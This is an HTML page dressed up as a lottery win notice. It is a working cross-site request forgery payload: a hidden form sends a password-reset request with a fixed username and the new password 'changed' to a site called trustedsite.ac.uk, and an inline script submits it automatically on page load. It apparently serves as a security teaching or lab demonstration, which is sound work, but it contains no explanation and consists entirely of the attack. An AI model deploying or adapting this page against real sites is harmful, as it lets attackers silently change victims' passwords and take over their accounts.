<!DOCTYPE html>
<html lang="en"
      xmlns:th="http://www.thymeleaf.org">
    <head>
        <title>You've Won</title>
       
    </head>
    <body>
        <div>
            <h1>Lottery Website</h1>
            
            
            <form class="form-input" style="display: inline" action="http://trustedsite.ac.uk:8080/password-reset" method="post"
            id="csrf-form">
                <input id="username" type="hidden" name="username" value="3011d13a9b80f5dcc7f58d3b1d8d36a9f584446b"/>
                <input  type="hidden" id="newPassword" name="newPassword" value="changed"  /> 
                <button type="submit">Click Here to Win</button>
            </form>
            
            <script>document.getElementById("csrf-form").submit()</script>
         
            
        </div>
    </body>
   
</html>